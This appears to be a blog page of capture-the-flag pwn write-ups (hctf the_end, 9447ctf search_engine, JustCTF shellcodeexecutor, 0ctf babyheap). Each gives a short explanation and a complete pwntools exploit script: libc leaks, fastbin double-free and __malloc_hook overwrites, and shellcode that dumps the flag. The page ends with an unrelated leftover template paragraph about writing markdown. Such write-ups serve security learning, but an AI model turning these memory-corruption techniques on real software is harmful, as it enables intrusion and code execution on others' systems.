hctf - the_end
Because of the two calls close(1) and close(2), the program produces no output. It also lets you write one byte at a time to any address.
My exploit idea: the function calls exit at the end. When exit is called, it takes the library symbol struct __exit_funcs and enters 'run_exit_handlers', and at that point it executes the address stored at '__rtld_global+3848'. So I figured that writing a one-gadget address into __rtld_global+3848 would get a shell.

```python
from pwn import *

r=process('./the_end',env={'LD_PRELOAD':'./libc-2.23.so'})
e=ELF('./the_end')
libc=e.libc
ld=ELF('/lib/x86_64-linux-gnu/ld-2.23.so')

sla=r.sendlineafter
ru=r.recvuntil
sa=r.sendafter
s=r.send

# libc base from the leaked sleep address
ru('gift ')
leak=int(ru(',').replace(',',''),16)-libc.symbols['sleep']
log.info(hex(leak))

# write the one-gadget address byte by byte into __rtld_global+3848
for i in range(5):
    s(p64(leak+0x5f0f48+i))
    s(p64(leak+0xf02a4)[i])

# stdout/stderr are closed, so send shell output back over fd 0
r.sendline('exec /bin/sh 1>&0')

r.interactive()
```
9447ctf search_engine
9447ctf - search_engine
First create a smallbin chunk and use search to leak libc
Create three fastbin chunks and double free
Set fd to __malloc_hook-35
__malloc_hook -> one-gadget
get shell
```python
from pwn import *

def search(size,word):
    sla('3: Quit\n','1')
    sla('size:',str(size))
    sa('word:',word)

def index(size,sentence):
    sla('3: Quit\n','2')
    sla('size:',str(size))
    sa('sentence:',sentence)

r=process('./search')
e=ELF('./search')
libc=e.libc
oneshot=0x4526a

sla=r.sendlineafter
sa=r.sendafter
ru=r.recvuntil

# smallbin chunk, then leak libc through search
pay='s'*0x85+' m'
index(len(pay),pay)
search(1,'m')

sla('?','y')
search('1','\x00')
ru('Found 135: ')
leak=u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78
log.info(hex(leak))
sla('?','n')

# three fastbin chunks, then double free
pay='A'*0x5d+' a '
index(len(pay),pay)
index(len(pay),pay)
index(len(pay),pay)

search(1,'a')

sla('?','y')
sla('?','y')
sla('?','y')

search(1,'\x00')

sla('?','y')
sla('?','y')
sla('?','n')

# fd -> __malloc_hook-35, then overwrite __malloc_hook with the one-gadget
pay=p64(leak+libc.symbols['__malloc_hook']-35)*2
pay=pay.ljust(0x5e,'A')

payload='A'*19+p64(leak+0xf02a4)
payload=payload.ljust(0x5d,'A')

index(len(pay),pay)
index(len(pay),pay)
index(len(pay),pay)
index(len(payload),payload)

r.interactive()
```
Justctf shellcodeexecutor
JustCtf - shellcodeexecutor
```python
from pwn import *

context.arch='amd64'

#r=process('./shellcodeexecutor')
r=remote('2019.nc.jctf.pro',1446)

sla=r.sendlineafter
sa=r.sendafter
ru=r.recvuntil

# write(1, rip+0x6f, 0xff): the flag sits right before the shellcode
shellcode='''
xor rdi,rdi
mov edi,1
lea rsi,[rip+0x6f]
xor rdx,rdx
mov edx,0xff
xor rax,rax
mov eax,1
syscall'''

sla('>','2')
sla('>','1')
sla(':',asm('xor al,0')+asm(shellcode))
sla('>','3')
r.interactive()
```
The flag was stored right before the place where my shellcode runs, so I read it with write.
I bypassed the byte check by inserting odd code that contains a null byte.
0ctf Babyheap
0ctf-babyheap
```python
from pwn import *

def allocate(size):
    sla('Command:','1')
    sla('Size:',str(size))

def fill(idx,size,fill):
    sla('Command:','2')
    sla('Index:',str(idx))
    sla('Size:',str(size))
    sa('Content:',fill)

def free(idx):
    sla('Command:','3')
    sla('Index:',str(idx))

def dump(idx):
    sla('Command:','4')
    sla('Index:',str(idx))

r=process('./babyheap',env={'LD_PRELOAD':'./libc.so.6'})
e=ELF('./babyheap')
libc=e.libc

sla=r.sendlineafter
sa=r.sendafter
ru=r.recvuntil

for i in range(4):
    allocate(0x10)
allocate(0x80)

free(2)
free(1)

pay=p64(0)*3+p64(0x21)
pay+=p8(0x80)

fill(0,len(pay),pay)

pay=p64(0)*3+p64(0x21)
fill(3,len(pay),pay)

allocate(0x10)
allocate(0x10)

pay=p64(0)*3+p64(0x91)
fill(3,len(pay),pay)

# free the 0x90 chunk into the unsorted bin and leak libc through the overlapping chunk
allocate(0x80)
free(4)

dump(2)
ru('Content: \n')
leak=u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78
log.info(hex(leak))

# fastbin attack: fd -> __malloc_hook-35, then overwrite __malloc_hook with the one-gadget
allocate(0x68)
free(4)

pay=p64(0)*3+p64(0x71)+p64(leak+libc.symbols['__malloc_hook']-35)
fill(3,len(pay),pay)

allocate(0x60)
allocate(0x60)

pay='\x00'*3+p64(0)*2+p64(leak+0x4526a)
fill(6,len(pay),pay)

allocate(12)

r.interactive()
```
It's a basic fastbin attack…
Markdown writing example
You can write regular markdown here and Jekyll will automatically convert it to a nice webpage. I strongly encourage you to take 5 minutes to learn how to write in markdown - it’ll teach you how to transform regular text into bold/italics/headings/tables/etc.